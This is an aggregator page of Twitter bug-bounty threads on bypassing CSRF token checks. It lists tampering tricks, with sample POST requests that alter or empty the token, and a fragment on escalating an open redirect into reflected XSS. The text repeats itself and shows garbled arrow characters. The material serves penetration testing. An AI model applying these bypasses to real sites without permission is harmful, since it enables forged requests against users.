Discover and read the best of Twitter Threads about #csrf
Most recents (2)
Bypass CSRF🔥#bugbountytips
âž¡Change single character
âž¡Sending empty value of token
âž¡Replace the token with same length
âž¡Changing POST / GET method
âž¡Remove the token from request
âž¡Use another user's valid token
âž¡Try to decrypt hash
#bugbounty #infosec
More in Detail :👇
âž¡Change single character
âž¡Sending empty value of token
âž¡Replace the token with same length
âž¡Changing POST / GET method
âž¡Remove the token from request
âž¡Use another user's valid token
âž¡Try to decrypt hash
#bugbounty #infosec
More in Detail :👇
â–ª Change single character of Parameter token #bugbounty #CSRF
. . .
POST /register HTTP/1.1
Host: target.com
...
username=dapos&password=123456&token=aaaaaaaaaa
To
username=dapos&password=123456&token=aaaaaaaaab
. . .
POST /register HTTP/1.1
Host: target.com
...
username=dapos&password=123456&token=aaaaaaaaaa
To
username=dapos&password=123456&token=aaaaaaaaab
â–ª Sending empty value of token #bugbounty #bugboutnytips #CSRF
. . .
POST /register HTTP/1.1
Host: target.com
...
username=dapos&password=123456&token=aaaaaaaaaa
To
username=dapos&password=123456&token=
. . .
POST /register HTTP/1.1
Host: target.com
...
username=dapos&password=123456&token=aaaaaaaaaa
To
username=dapos&password=123456&token=
Another new idea for #PenetrationTesting and #Bug-hunting:
Tester:
Enhance the force of #vulnerabilities by doing things like
I discovered a free #URL that leads somewhere else.
Put this in my report and move on ?
Tester:
Enhance the force of #vulnerabilities by doing things like
I discovered a free #URL that leads somewhere else.
Put this in my report and move on ?
To the contrary, changing the #payload allowed me to transform it into a reflected #XSS #vulnerability. Is this the final question?
Obviously not if I have any hope of carrying on.
Obviously not if I have any hope of carrying on.
